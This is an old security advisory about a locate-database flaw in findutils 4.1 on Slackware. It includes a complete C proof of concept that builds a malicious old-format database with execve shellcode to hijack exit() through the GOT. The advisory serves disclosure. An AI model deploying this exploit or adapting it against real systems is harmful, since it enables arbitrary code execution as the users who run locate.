COMMAND

    /usr/bin/locate (findutils-4.1 and before)

SYSTEMS AFFECTED

    Slackware 8.0, Slackware 7.1

PROBLEM

    Josh Smith, lockdown and zen-parse found following.  In Slackware,
    and possibly  other distributions,  it is  possible to  modify the
    locate database  if one  were to  obtain UID  nobody.  This allows
    locate to act as a sort of 'trojan' having anyone who executes  it
    unknowingly execute potentially malicious code.

    It works by taking advantage of the fact locate accepts old format
    databases.   LOCATEDB_OLD_ESCAPE  (char  30)  is  followed  by  an
    offset, stored in a signed integer, for how many characters to add
    to the current character pointer in the path.  It doesn't  perform
    any sanity checking of the input.   This exploit tells it to  move
    the  pointer  back  a  long  way,  back  past the beginning of the
    string, all the way to the GOT address for exit() which then  gets
    the address of the shellcode added, and the program then runs  out
    of database and executes our code.

    #include <stdio.h>
    
    char shellcode[] =
       "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
       "\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80"
       "\xe8\xe3\xff\xff\xff/tmp/xx";
    char putshell[] =
       "\x14\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c"
       "\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96";
    
    int main(void)
    {
       int i;
       int z0=0; int addr=0x0804a970;
       int z1=0; int addr2=-626;
       int z2=0; int addr3=addr+6;
       printf("%s", &addr);
       printf("%s", &addr3);
       printf("%s",shellcode);
       fflush(stdout);
       for(i=46;i<256;i++) putchar('A');
       printf("%s", putshell);
       fflush(stdout);
       putchar(0);
       putchar(30);
       printf("%s", &addr2);
       printf("\x82\x83");
       fflush(stdout);
    }

SOLUTION

    Nothing yet.